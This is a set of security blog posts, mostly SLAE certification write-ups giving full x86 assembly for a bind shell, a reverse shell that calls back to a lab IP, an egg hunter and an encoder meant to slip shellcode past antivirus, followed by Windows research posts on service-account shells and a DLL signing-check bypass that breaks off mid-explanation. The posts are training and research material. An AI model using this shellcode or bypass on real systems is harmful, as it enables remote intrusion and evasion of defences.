write() has 3 arguments (fd, *buf, count). It writes up to count bytes from the buffer pointed to by buf to the file referred to by the file descriptor fd.



The following is what gets written into the /etc/passwd file.
USER=test
PASS=password (in this case it is hashed)
SHELL=/bin/bash



syscall #4: eax has 1 or exit() loaded to it....enough said.




0x2 - linux/x86/chmod

We again generate a shellcode with the following options:

FILE=/home/slae/test.txt
MODE=0777





Compile and we load the file in gdb.


We put a breakpoint at the system  call @ +37 (0x804a065)

Syscall: eax has 15 or chmod() loaded to it.



chmod() requires two arguments: pathname and mode

pathname: /home/slae/test.txt (ebx)



mode: 0777 (ecx) 

Here we can see 0x1ff (0777) pushed to the stack and popped into ecx


0x3 - linux/x86/exec

We generate a shellcode with the following option:

CMD=ifconfig



Compile and load it in gdb


We put a breakpoint at the system call @ +42 (0x0804a06a)

syscall: eax has 11 or execve() loaded to it.



Here we see the first part of the string for the command /bin/sh -c loaded into ebx.





The next string should be ifconfig, however, I couldn't find it using gdb. I ended up using ndisasm for this next step.

 
Call dword 0x26 is what we are looking for. Looking at 1D to 24, we can see that these are the opcodes for ifconfig. 


Furthermore, plugging in the next opcodes (26 through 29) shows how the entire command string (/bin/sh -c ifconfig) is pushed onto the stack (esp) and loaded into ecx.




Thank you for reading.

Shellcode Encoder

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #4 - Encoder
 - Create a custom encoding scheme


~~~~~~~~~//*****//~~~~~~~~~



For this assignment, we will be encoding an execve shellcode that spawns a /bin/sh, using XOR and then NOT encoding. The idea behind encoding is that we can alter the opcodes without altering their functionality. For instance, using the shellcode below, it is pretty clear that our shellcode contains \x2f\x2f\x73\x68\x2f\x62\x69\x6e which translates to //bin/sh. Among other things, this is something that could easily be caught by Anti-Virus (AV) or an Intrusion Detection System (IDS).

Below is the original execve-stack.nasm file and its corresponding opcodes/shellcode.






Once we have the original shellcode, I used Python for the encoding, which will be a two-step process: XOR encoding first, then NOT encoding the result of the first step.

Here we initialize it with our original shellcode from execve-stack.nasm file:


The first step is the XOR encoding. For this step, I am going through each byte of the original shellcode and XOR'ing it with 0xaa.


The second step is to encode each byte of the result from XOR encoding, with a NOT encoding.




Below is the output of the encoder Python script. I am printing both the XOR and NOT encoded shellcodes; however, we will only need the NOT encoded shellcode for our decoder.



With the 'XOR then NOT' encoded shellcode, we are now ready to create our decoder to revert or decode it back to the original shellcode.

For this step, I am using the jmp-pop-call method again. The call instruction pushes the address of the encoded shellcode onto the stack; we then pop it into a register (esi for this one). We can then loop through each byte of the encoded shellcode pointed to by esi.

We first do a NOT then followed by XOR 0xaa.

Below shows the encoding and decoding scheme for the first byte

encoding: 0x31 ---> 0x9b (0x31 XOR 0xaa) ---> 0x64 (NOT 0x9b & 0xff)
decoding: 0x64 ---> 0x9b (NOT 0x64 & 0xff) ---> 0x31 (0x9b XOR 0xaa)
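The actual encoder lives in the Python script shown in the (omitted) screenshots; purely as a sketch of the same two-step transform and its inverse, a C round-trip looks like this (the sample byte is the one from the table above):

#include <stdio.h>

// XOR-then-NOT encode, and the inverse NOT-then-XOR decode
unsigned char encode(unsigned char b) { return (unsigned char)~(b ^ 0xaa); }
unsigned char decode(unsigned char b) { return (unsigned char)(~b) ^ 0xaa; }

int main(void) {
    unsigned char original = 0x31;             // first byte of the execve shellcode
    unsigned char encoded = encode(original);  // 0x31 -> 0x9b -> 0x64
    unsigned char decoded = decode(encoded);   // 0x64 -> 0x9b -> 0x31
    printf("original %02x encoded %02x decoded %02x\n", original, encoded, decoded);
    return 0;
}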

...and here's the complete nasm file with our decoder.



We compile then generate a new shellcode using objdump.


We update our shellcode.c file, compile it and execute.

Note that with this new shellcode, we can 'hide' the //bin/sh while maintaining the functionality.


SUCCESS!


Egg Hunter

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #3 - Egghunter
        

          - Create a working demo of the egg hunter

~~~~~~~~~//*****//~~~~~~~~~


For the 3rd assignment, I will be creating an 'egg hunter' shellcode. This wasn't covered in the SLAE course. As mentioned in a lot of SLAE blogs, a good source is skape's research paper. My shellcode did not deviate too much from what skape has shown. I created some labels to make it more readable and easier to follow the flow of instructions.

What is an egg hunter? Why do we need it?

An egg hunter is a small shellcode that locates and jumps to another shellcode. It is basically a staged shellcode where the egg hunter is stage one while the actual shellcode that spawns the shell (reverse, bind, meterpreter, etc.) is stage two. It is needed during exploit development (e.g. a buffer overflow) where the application only allows a small space for shellcode: too small for the stage two shellcode, but with enough room for stage one.

This is accomplished by using an 'egg', a unique 8-byte marker (a 4-byte value repeated twice). The egg is referenced by stage one and prepended to the stage two shellcode. When the stage one shellcode executes, it searches memory for the unique 8-byte egg and transfers execution control to stage two.
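The real hunter below walks the whole address space and uses access() to skip unmapped pages; as a conceptual sketch only (not the author's code), the search itself boils down to something like this C helper, which looks for the 4-byte tag 0x50905090 repeated twice inside a known buffer:

#include <stddef.h>
#include <string.h>

// Returns a pointer to the 8-byte egg if found, otherwise NULL. Execution is
// transferred to the egg itself: 0x50905090 disassembles to harmless
// nop / push eax instructions, so stage two can simply follow it.
unsigned char *find_egg(unsigned char *buf, size_t len) {
    const unsigned char tag[4] = { 0x90, 0x50, 0x90, 0x50 };
    for (size_t i = 0; i + 8 <= len; i++) {
        if (memcmp(buf + i, tag, 4) == 0 && memcmp(buf + i + 4, tag, 4) == 0)
            return buf + i;
    }
    return NULL;
}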

Here I globally defined the egg with the following and then initialized the eax, ebx, ecx, edx registers:

       %define _EGG 0x50905090

       xor ebx, ebx                ;remove x00/NULL byte
       mov ebx, _EGG               ;move the 0x50905090 egg into the ebx register
       xor ecx, ecx                ;remove x00/NULL byte
       mul ecx                     ;initializes eax, ecx, edx with 0x00000000


We are now ready to do some system calls. According to skape, two system calls can be used: access() and sigaction(). For this write-up, I will only be using access().


We will be using the *pathname pointer argument to validate the address that will contain our egg.

 I globally defined two more variables: the access() syscall and EFAULT

      %define _SYSCALL_ERR 0xf2        ;EFAULT (-14) as a byte
      %define __NR_access 0x21         ;syscall 33 for access(2)

...and created two labels: NEXT_PAGEFILE and NEXT_ADDRESS

The first label is used to switch to the next page if an invalid memory address is returned by the syscall. Each page (PAGESIZE) contains 4096 bytes. This is accomplished using an OR instruction.

NEXT_PAGEFILE:

      or dx, 0xfff                ;note that edx is the *pathname pointer
                                  ;0xfff == 4095, align edx to the end of the current page

The second label will be our meat and potatoes. Within this label or procedure, we call the access(2) syscall, compare the results (egg hunting), and loop through the address space.

NEXT_ADDRESS:

        inc edx                     ;increments edx, check the next address for the egg
        pusha                       ;push eax, ebx, ecx, edx...these registers are used multiple times,
                                    ;pushing them to the stack preserves their values for when they are popped
        lea ebx, [edx +4]
        xor eax, eax                ;remove x00/NULL byte
        mov al, __NR_access         ;syscall 33 for access(2)
        int 0x80                    ;interrupt/execute

        ;egg hunting begins

        cmp al, _SYSCALL_ERR        ;compares the return value in al to 0xf2 (EFAULT)
        popa                        ;branch, pop eax, ebx, ecx, edx
        jz NEXT_PAGEFILE            ;al return value == EFAULT, invalid memory address,
                                    ;move to the next PAGESIZE

        cmp [edx], ebx              ;if the al return value != EFAULT, execute this instruction,
                                    ;compares the egg with the value at edx
        jnz NEXT_ADDRESS            ;not EFAULT but _EGG not found, loop again

        cmp [edx +4], ebx           ;_EGG found, test for the next 4 bytes of the _EGG
        jnz NEXT_ADDRESS            ;if the next 4 bytes at edx != _EGG, loop again

        jmp edx                     ;finally, 8 bytes of _EGG found, jmp to the address in edx

We compile our nasm file and obtain our shellcode using objdump.


We now have our stage one shellcode and for the stage two shellcode, I will be using the reverse TCP shellcode from SLAE Assignment #2.

I updated the shellcode.c file to include both stage one and stage two shellcodes as seen below.



For testing, I am using my kali box again to receive the reverse TCP shell. We compile our shellcode.c, open a listener in Kali and run the exploit.



SUCCESS!!



Reverse TCP Shell

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #2 - Create a Shell_Reverse_TCP shellcode
      

      - Reverse connects to configured IP and Port
      - Execs shell on successful connection
      - IP and Port should be easily configurable

~~~~~~~~~~//*****//~~~~~~~~~~


Creating a REVERSE_TCP shell consists of 3 functions:

0x1 socket
0x2 connect
0x3 execve



0x1 - socket

Similar to assignment #1, the first thing we need to do is set up our socket. This can be accomplished by pushing the following parameters onto the stack.

We push the following values in reverse order since the stack is accessed as Last-In-First-Out (LIFO):

                push 0x6                ;TCP or 0x6
                push 0x1                ;SOCK_STREAM or 0x1
                push 0x2                ;AF_INET or 0x2

We can then invoke the socketcall() system call, as shown below:

               xor eax, eax            ;remove x00/NULL byte
               mov al, 0x66            ;syscall 102 for socketcall
               xor ebx, ebx            ;remove x00/NULL byte
               mov bl, 0x1             ;net.h SYS_SOCKET 1 (0x1)
               xor ecx, ecx            ;remove x00/NULL byte
              mov ecx, esp            ;arg to SYS_SOCKET
              int 0x80                ;interrupt/execute


              mov edi, eax            ;sockfd, store return value of eax into edi


0x2 - connect

Once our socket is set-up, the next step is to invoke the connect() system call. This will be used to connect back to the listening machine, through the socket using an IP address and Port destination.

Below shows what we need for the connect():



One main difference between a reverse shell and a bind shell is that we need both the IP and port of the listening machine for the reverse shell. Specifically, we use 192.168.199.130 and port 4445 as the IP and port respectively. We load both the IP and the port onto the stack using the jmp-pop-call method again. We first do a jmp to the label that contains our IP and port. The address of that IP and port data is then pushed onto the stack when the call instruction executes. We can then use the pop esi instruction, which loads that address into the esi register. Finally, to split the IP and port, we do a push dword[esi], which pushes the first 4 bytes (192.168.199.130), and then a push word[esi +4], which pushes the last two bytes (port 4445).

We then call the socketcall() and SYS_CONNECT.


   reverse_jump:

        jmp short reverse_ip_port


    connect:

        ;int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen)


        pop esi                         ;pops the address of the IP+port data (6 bytes) into esi
        xor eax, eax                    ;removes x00/NULL byte
        xor ecx, ecx                    ;removes x00/NULL byte
        push dword[esi]                 ;push IP (first 4 bytes at esi)
        push word[esi +4]               ;push PORT (last 2 bytes)
        mov al, 0x2                     ;AF_INET IPV4
        push ax
        mov eax, esp                    ;store stack address in eax (struct sockaddr)
        push 0x10                       ;store length addr on stack
        push eax                        ;push struct sockaddr to the stack
        push edi                        ;sockfd from the eax in _start
        xor eax, eax                    ;removes x00/NULL byte
        mov al, 0x66                    ;syscall 102 for socketcall
        xor ebx, ebx                    ;removes x00/NULL byte
        mov bl, 0x03                    ;net.h SYS_CONNECT 3
        mov ecx, esp                    ;arg for SYS_CONNECT
        int 0x80



    reverse_ip_port:

        call connect

        reverse_ip dd 0x82c7a8c0       ;192.168.199.130, hex in little endian
        reverse_port dw 0x5d11          ;port 4445, hex in little endian



0x3 - execve

Before the execve() syscall can be invoked, we have to set up dup2() calls to ensure that stdin/stdout/stderr all go through the socket. We use the same technique utilized in assignment #1.

   change_fd:

        ;multiple dup2() to ensure that stdin, stdout, std error will
        ;go through the socket connection

        xor ecx, ecx            ;removes 0x00/NULL byte, 0 (std in)
        xor eax, eax            ;removes 0x00/NULL byte
        xor ebx, ebx            ;removes 0x00/NULL byte
        mov ebx, edi            ;sockfd from the eax _start
        mov al, 0x3f            ;syscall 63 for dup2
        int 0x80                ;interrupt/execute

        mov al, 0x3f            ;syscall 63 for dup2
        inc ecx                 ;+1 to cx, 1 (std out)
        int 0x80                ;interrupt/execute

        mov al, 0x3f            ;syscall 63 for dup2
        inc ecx                 ;+1 to ecx, 2 (std error)
        int 0x80                ;interrupt/execute


Shell time! Shells for everyone!

This is no different than the assignment #1 shell. We use the execve() syscall to invoke a /bin/sh, however this time its stdin/stdout go back to the listening machine through the socket.

  execve:
         xor eax, eax             ;removes x00/NULL byte
         push eax                   ;push first null dword

         push 0x68732f2f      ;hs//
         push 0x6e69622f      ;nib/

         mov ebx, esp             ;save stack pointer in ebx

         push eax                    ;push null byte terminator
         mov edx, esp             ;moves address of 0x00hs//nib/ into edx

         push ebx                    
         mov ecx, esp          

         mov al, 0xb                ;syscall 11 for execve
         int 0x80


Testing our reverse shell

First, we start by compiling our nasm file into an executable and then opening up a listener on our Kali box.




Execute the file and we get a reverse TCP connection back to our kali


SUCCESS...our reverse shell works.


We then use objdump to get our actual shellcode...


Copy the shellcode into our c file, test reverse shell again and we get another successful reverse shell to the kali listener.








SLAE Certification

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

~~~~~~~~~//*****//~~~~~~~~~

I started my offsec journey back in Feb 2007 when I registered for Offensive Security Certified Professional (OSCP) and completed the certification in June of that same year. Almost 3 years later, I finally decided to start on Offensive Security Certified Expert (OSCE), and one of the baseline requirements for this certification is familiarity with Linux assembly language. Several OSCE preparation/exam reviews pointed to SecurityTube's Linux Assembly Expert (SLAE, 32-bit) course as a good course to prepare for OSCE. The course is provided at an affordable price of $130 and the certification is really unique. After completing the course, students are required to complete seven assignments (listed below) to obtain the certification.

SLAE Assignment #1 - Bind TCP Shell
SLAE Assignment #2 - Reverse TCP Shell
SLAE Assignment #3 - Egg Hunter
SLAE Assignment #4 - Encoder
SLAE Assignment #5 - Shellcode Analysis
SLAE Assignment #6 - Polymorphism
SLAE Assignment #7 - Crypter 

Shout out to Vivek for doing an amazing job teaching the course. It was a perfect blend of the crawl, walk, run--from learning the basics of assembly registers to operations/conditions/controls/loops, creating shellcodes, and finally creating encoders/polymorphism/crypters. 

Bind TCP Shell

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517

Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #1 - Create a Shell_BIND_TCP Shellcode

    - Binds to a port
    - Execs Shell on incoming connection
    - Port number should be easily configurable


~~~~~~~~~//*****//~~~~~~~~~



Creating a BIND_TCP shell can be broken down into 5 functions.

0x1 socket
0x2 bind
0x3 listen
0x4 accept
0x5 execve


... let us begin


0x1 - socket

First, we create a socket. socket() requires 3 arguments: domain, type, protocol as seen below.


domain = AF_INET or 0x2


type = SOCK_STREAM or 0x1


protocol = TCP or 0x6


We will also be using this net.h file when we invoke the syscalls; it covers the networking-handling part of the kernel.



We push the following values in reverse order since the stack is accessed as Last-In-First-Out (LIFO)

               push 0x6
               push 0x1
               push 0x2

Once the arguments are on the stack, we invoke the socketcall() syscall to actually create the socket



             xor eax, eax             ;remove x00/NULL byte
             mov al, 0x66             ;syscall 102 (0x66) for socketcall
             xor ebx, ebx             ;remove x00/NULL byte
             mov bl, 0x1              ;net.h SYS_SOCKET 1 (0x1)
             xor ecx, ecx             ;remove x00/NULL byte
             mov ecx, esp             ;arg 2, esp address to ecx
             int 0x80                 ;interrupt/execute

             mov edi, eax             ;sockfd, this will be referenced throughout the shellcode

0x2 - bind

One common concept in the SLAE course is the use of JMP-CALL-POP, which gives us a way to dynamically access addresses. This works because when a call instruction is used, the address of the next instruction is automatically pushed onto the stack.



          bind:
                jmp short port_to_bind

          call_bind:
                pop esi                 ;pops the address of port_number into esi
                xor eax, eax            ;remove x00/NULL byte
                push eax                ;push eax NULL value to the stack
                push word[esi]          ;push the actual port number to the stack, word=2 bytes
                mov al, 0x2             ;AF_INET IPv4
                push ax
                mov edx, esp            ;store stack addr (struct sockaddr)
                push 0x10               ;store length addr on stack
                push edx                ;push struct sockaddr to the stack
                push edi                ;sockfd from the eax in _start
                xor eax, eax            ;remove x00/NULL byte
                mov al, 0x66            ;syscall 102 for socketcall
                mov bl, 0x02            ;net.h SYS_BIND 2 (0x02)
                mov ecx, esp            ;arg for SYS_BIND
                int 0x80                ;interrupt/execute

          port_to_bind:
                call call_bind
                port_number dw 0x5d11   ;port 4445 (0x115d)
                                        ;its address gets pushed to the stack by the call instruction

0x3 - listen


The listen() syscall is pretty straightforward.


            push 0x1                         ; int backlog
            push edi                          ; sockfd from eax _start
           xor eax, eax                    ;remove x00/NULL byte
           mov al, 0x66                   ;syscall 102 for socketcall
           xor ebx, ebx                    ;remove x00/NULL byte
          mov bl, 0x4                      ;net.h SYS_LISTEN 4
          xor ecx, ecx                     ;remove x00/NULL byte
          mov ecx, esp                    ;arg for SYS_LISTEN
          int 0x80                           ;interrupt/execute

0x4 - accept

Likewise, accept() is pretty straightforward.



             xor eax, eax                  ;remove x00/NULL byte
             push eax                       ;push NULL value to addrlen
             xor ebx, ebx                 ;remove x00/NULL byte
            push ebx                       ;push NULL value to addr
            push edi                        ;sockfd from eax _start
            mov al, 0x66                 ;syscall 102 for socketcall
            mov bl, 0x5                   ;net.h SYS_ACCEPT 5
            xor ecx, ecx                  ;remove x00/NULL byte
            mov ecx, esp                 ;arg for SYS_ACCEPT
            int 0x80                         ;interrupt/execute

0x4a - change_fd


These are the dup2() calls which ensure that the /bin/sh stdin, stdout, and stderr go through the socket connection.

       
            mov ebx, eax                  ;moves fd from accept to ebx
            xor ecx, ecx                    ;removes 0x00/NULL byte, 0 (std in)
            xor eax, eax                   ;removes 0x00/NULL byte
            mov al, 0x3f                  ;syscall 63 for dup2
            int 0x80                         ;interrupt/execute

            mov al,0x3f                   ;syscall 63 for dup2
            inc ecx                           ;+1 to ecx, 1 (std out)
            int 0x80                         ;interrupt/execute

            mov al, 0x3f                  ;syscall 63 for dup2
            inc ecx                           ;+1 to ecx, 2 (std error)
            int 0x80                         ;interrupt/execute

0x5 - execve

At this point we have successfully set up our socket(), bound it to a port with bind(), and we can listen() for incoming connections and accept() them. We are now ready to run our execve(). Once the connection is established, execve will be used to execute /bin/sh.


The following instructions are taken directly from the execve module of the SLAE course.

             xor eax, eax                 ;removes x00/NULL byte
             push eax                      ;push first null dword

             push 0x68732f2f          ;hs// 
             push 0x6e69622f          ;nib/

              mov ebx, esp              ;save stack pointer in ebx
             push eax                       ; push null byte as 'null byte terminator'
             mov edx, esp               ;moves address of 0x00hs//nib/ into edx

             push ebx
             mov ecx, esp

             mov al, 0xb                 ; syscall 11 for execve
             int 0x80


And we are done!

Testing our bind shell.

We compile nasm file and execute it.



Then using another machine (Kali), I connect to the Ubuntu machine, which spawns a /bin/sh shell, and we can run commands remotely.

BT IP: 192.168.199.128
Ubuntu IP: 192.168.199.129


We can also run the netstat command in the ubuntu machine to verify the established connection between the BT and Ubuntu machines:

Success..we can see the connection established.


Finally, we use objdump to obtain the shellcode from our executable


***Note: the last 2 bytes of the shellcode are the port to bind on (keeping the little-endian structure in mind). We should be able to just change the last 2 bytes of the shellcode to configure a different port to bind on.

Here's an example of using the shellcode with a .c program
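The actual shellcode.c is shown in a screenshot; as a stand-in, a typical SLAE-style harness looks roughly like the sketch below (the shellcode bytes are placeholders for the objdump output above, and the final two bytes are the bind port):

#include <stdio.h>
#include <string.h>

// placeholder bytes: paste the real shellcode from objdump here,
// ending with the two port bytes (0x11 0x5d == port 4445)
unsigned char code[] = "\x31\xc0...\x11\x5d";

int main(void)
{
    printf("Shellcode Length: %d\n", (int)strlen(code));
    // compile with: gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}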




We compile shellcode.c, execute it and connect to 4445 from our BT machine.



SUCCESS!






Getting an Interactive Service Account Shell

By: tiraniddo
9 February 2020 at 23:21
Sometimes you want to manually interact with a shell running as a service account. Getting a working interactive shell for SYSTEM is pretty easy. As an administrator, pick a process with an appropriate access token running as SYSTEM (say services.exe) and spawn a child process using that as the parent. As long as you specify an interactive desktop, e.g. WinSta0\Default, then the new process will be automatically assigned to the current session and you'll get a visible window.

To make this even easier, NtObjectManager implements the Start-Win32ChildProcess command, which works like the following:

PS> $p = Start-Win32ChildProcess powershell

And you'll now see a console window with a copy of PowerShell. What if you want to instead spawn Local Service or Network Service? You can try the following:

PS> $user = Get-NtSid -KnownSid LocalService
PS> $p = Start-Win32ChildProcess powershell -User $user

The process starts; however, you'll find it immediately dies:

PS> $p.ExitNtStatus
STATUS_DLL_INIT_FAILED

The error code, STATUS_DLL_INIT_FAILED, basically means something during initialization failed. Tracking this down is a pain in the backside, especially as the failure happens before a debugger such as WinDBG typically gets control over the process. You can enable the Create Process event filter, but you still have to track down why it fails.

I'll save you the pain, the problem with running an interactive service process is the Local Service/Network Service token doesn't have access to the Desktop/Window Station/BaseNamedObjects etc for the session. It works for SYSTEM as that account is almost always granted full access to everything by virtue of either the SYSTEM or Administrators SID, however the low-privileged service accounts are not.

One way of getting around this would be to find every possible secured resource and add the service account. That's not really very reliable; miss one resource and it might still not work, or it might fail at some indeterminate time. Instead we do what the OS does: we need to create the service token with the Logon Session SID, which will grant us access to the session's resources.

First create a SYSTEM powershell command on the current desktop using the Start-Win32ChildProcess command. Next get the current session token with:

PS>  $sess = Get-NtToken -Session

We can print out the Logon Session SID now, for interest:

PS> $sess.LogonSid.Sid
Name                                     Sid
----                                     ---
NT AUTHORITY\LogonSessionId_0_41106165   S-1-5-5-0-41106165

Now create a Local Service token (or Network Service, or IUser, or any service account) using:

PS> $token = Get-NtToken -Service LocalService -AdditionalGroups $sess.LogonSid.Sid

You can now create an interactive process on the current desktop using:

PS> New-Win32Process cmd -Token $token -CreationFlags NewConsole

You should find it now works :-)

A command prompt, running whoami and showing the user as Local Service.



DLL Import Redirection in Windows 10 1909

By: tiraniddo
8 February 2020 at 16:47
While poking around in NTDLL the other day for some Chrome work I noticed an interesting sounding new feature, Import Redirection. As far as I can tell this was introduced in Windows 10 1809, although I'm testing this on 1909.

What piqued my interest was that during initialization I saw the following code being called:

NTSTATUS LdrpInitializeImportRedirection() {
    PUNICODE_STRING RedirectionDllName =     
          &NtCurrentPeb()->ProcessParameters->RedirectionDllName;
    if (RedirectionDllName->Length) {
        PVOID Dll;
        NTSTATUS status = LdrpLoadDll(RedirectionDllName, 0x1000001, &Dll);
        if (NT_SUCCESS(status)) {
            LdrpBuildImportRedirection(Dll);
        }
        // ...
    }

}

The code was extracting a UNICODE_STRING from the RTL_USER_PROCESS_PARAMETERS block then passing it to LdrpLoadDll to load it as a library. This looked very much like a supported mechanism to inject a DLL at startup time. Sounds like a bad idea to me. Based on the name it also sounds like it supports redirecting imports, which really sounds like a bad idea.

Of course it’s possible this feature is mediated by the kernel. Most of the time RTL_USER_PROCESS_PARAMETERS is passed verbatim during the call to NtCreateUserProcess, it’s possible that the kernel will sanitize the RedirectionDllName value and only allow its use from a privileged process. I went digging to try and find who was setting the value, the obvious candidate is CreateProcessInternal in KERNELBASE. There I found the following code:

BOOL CreateProcessInternalW(...) {
    LPWSTR RedirectionDllName = NULL;
    if (!PackageBreakaway) {
        BasepAppXExtension(PackageName, &RedirectionDllName, ...);
    }


    RTL_USER_PROCESS_PARAMETERS Params = {};
    BasepCreateProcessParameters(&Params, ...);
    if (RedirectionDllName) {
        RtlInitUnicodeString(&Params->RedirectionDllName, RedirectionDllName);
    }


    // ...

}

The value of RedirectionDllName is being retrieved from BasepAppXExtension which is used to get the configuration for packaged apps, such as those using Desktop Bridge. This made it likely it was a feature designed only for use with such applications. Every packaged application needs an XML manifest file, and the SDK comes with the full schema, therefore if it’s an exposed option it’ll be referenced in the schema.

Searching for related terms I found the following inside UapManifestSchema_v7.xsd:

<xs:element name="Properties">
  <xs:complexType>
    <xs:all>
      <xs:element name="ImportRedirectionTable" type="t:ST_DllFile" 
                  minOccurs="0"/>
    </xs:all>
  </xs:complexType>
</xs:element>

This fits exactly with what I was looking for. Specifically the Schema type is ST_DllFile which defined the allowed path component for a package relative DLL. Searching MSDN for the ImportRedirectionTable manifest value brought me to this link. Interestingly though this was the only documentation. At least on MSDN I couldn’t seem to find any further reference to it, maybe my Googlefu wasn’t working correctly. However I did find a Stack Overflow answer, from a Microsoft employee no less, documenting it *shrug*. If anyone knows where the real documentation is let me know.

With the SO answer I know how to implement it inside my own DLL. I need to define list of REDIRECTION_FUNCTION_DESCRIPTOR structures which define which function imports I want to redirect and the implementation of the forwarder function. The list is then exported from the DLL through a REDIRECTION_DESCRIPTOR structure as   __RedirectionInformation__. For example the following will redirect CreateProcessW and always return FALSE (while printing a passive aggressive statement):

BOOL WINAPI CreateProcessWForwarder(
    LPCWSTR lpApplicationName,
    LPWSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,
    DWORD dwCreationFlags,
    LPVOID lpEnvironment,
    LPCWSTR lpCurrentDirectory,
    LPSTARTUPINFOW lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation)
{
    printf("No, I'm not running %ls\n", lpCommandLine);
    return FALSE;
}


const REDIRECTION_FUNCTION_DESCRIPTOR RedirectedFunctions[] =
{
    { "api-ms-win-core-processthreads-l1-1-0.dll", "CreateProcessW"
                  &CreateProcessWForwarder },
};


extern "C" __declspec(dllexport) const REDIRECTION_DESCRIPTOR __RedirectionInformation__ =
{
    CURRENT_IMPORT_REDIRECTION_VERSION,
    ARRAYSIZE(RedirectedFunctions),
    RedirectedFunctions

};

I compiled the DLL, added it to a packaged application, added the ImportRedirectionTable manifest value and tried it out. It worked! This seems a perfect feature for something like Chrome as it allows us to use a supported mechanism to hook imported functions without implementing hooks on NtMapViewOfSection and things like that. There are some limitations; it seems to not always redirect imports you think it should. This might be related to the mention in the SO answer that it only redirects imports directly in your application's dependency graph and doesn't support GetProcAddress. But you could probably live with that.

However, to be useful in Chrome it obviously has to work outside of a packaged application. One obvious limitation is there doesn’t seem to be a way of specifying this redirection DLL if the application is not packaged. Microsoft could support this using a new Process Thread Attribute, however I’d expect the potential for abuse means they’d not be desperate to do so.

The initial code doesn’t seem to do any checking for the packaged application state, so at the very least we should be able to set the RedirectionDllName value and create the process manually using NtCreateUserProcess. The problem was when I did the process initialization failed with STATUS_INVALID_IMAGE_HASH. This would indicate a check was made to verify the signing level of the DLL and it failed to load.

Trying with any Microsoft signed binary instead I got STATUS_PROCEDURE_NOT_FOUND which would imply the DLL loaded but obviously the DLL I picked didn't export __RedirectionInformation__. Trying a final time with a non-Microsoft, but signed binary I got back to STATUS_INVALID_IMAGE_HASH again. It seems that outside of a packaged application we can only use Microsoft signed binaries. That’s a shame, but oh well, it was somewhat inconvenient to use anyway.

Before I go there are two further undocumented functions (AFAIK) the DLL can export.

BOOL __ShouldApplyRedirection__(LPWSTR DllName)

If this function is exported, you can disable redirection for individual DLLs based on the DllName parameter by returning FALSE.

BOOL __ShouldApplyRedirectionToFunction__(LPWSTR DllName, DWORD Index)

This function allows you to disable redirection for a specific import on a DLL. Index is the offset into the redirection table for the matched import, so you can disable redirection for certain imports for certain DLLs.
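Based on those two prototypes (this is only a sketch of how the exports might be wired up alongside __RedirectionInformation__, not code from the post; the DLL name and index check are made up for illustration, and in a C++ build you'd wrap them in extern "C" like the earlier export), implementing them in the redirection DLL could look like:

#include <windows.h>

// Return FALSE to opt a whole DLL out of redirection.
__declspec(dllexport) BOOL __ShouldApplyRedirection__(LPWSTR DllName)
{
    // hypothetical: leave some helper DLL alone
    if (DllName && lstrcmpiW(DllName, L"somehelper.dll") == 0)
        return FALSE;
    return TRUE;
}

// Return FALSE to opt a single redirected import out for a given DLL.
// Index is the offset into the redirection table for the matched import.
__declspec(dllexport) BOOL __ShouldApplyRedirectionToFunction__(LPWSTR DllName, DWORD Index)
{
    return Index == 0;   // only keep the first entry (CreateProcessW) redirected
}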

In conclusion, this is an interesting feature Microsoft added to Windows to support a niche edge case, and then seems to have not officially documented it. Nice! However, it doesn’t look like it’s useful for general purpose import redirection as normal applications require the file to be signed by Microsoft, presumably to prevent this being abused by malicious code. Also there's no trivial way to specify the option using CreateProcess and calling NtCreateUserProcess doesn't correctly initialize things like SxS and CSRSS connections.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

Now if you’ve bothered to read this far, I might as well admit you can bypass the signature check quite easily. Digging into where the DLL loading fails we find the following code inside LdrpMapDllNtFileName:

if ((LoadFlags & 0x1000000) && !NtCurrentPeb()->IsPackagedProcess)
{
  status = LdrpSetModuleSigningLevel(FileHandle, 8);
  if (!NT_SUCCESS(status))
    return status;

}

If you look back at the original call to LdrpLoadDll you'll notice that it was passing flag 0x1000000, which presumably means the DLL should be checked against a known signing level. The check is also disabled if the process is in a Packaged Process through a check on the PEB. This is why the load works in a Packaged Application, this check is just disabled. Therefore one way to get around the check would be to just use a Packaged App of some form, but that's not very convenient. You could try setting the flag manually by writing to the PEB, however that can result in the process not working too well afterwards (at least I couldn't get normal applications to run if I set the flag).

What is LdrpSetModuleSigningLevel actually doing? Perhaps we can just bypass the check?

NTSTATUS LdrpSetModuleSigningLevel(HANDLE FileHandle, BYTE SigningLevel) {
    DWORD Flags;
    BYTE CurrentLevel;
    NTSTATUS status = NtGetCachedSigningLevel(FileHandle, &Flags, &CurrentLevel);
    if (NT_SUCCESS(status))
        status = NtCompareSigningLevel(CurrentLevel, SigningLevel);
    if (!NT_SUCCESS(status))
        status = NtSetCachedSigningLevel(4, SigningLevel, &FileHandle);
    return status;

}

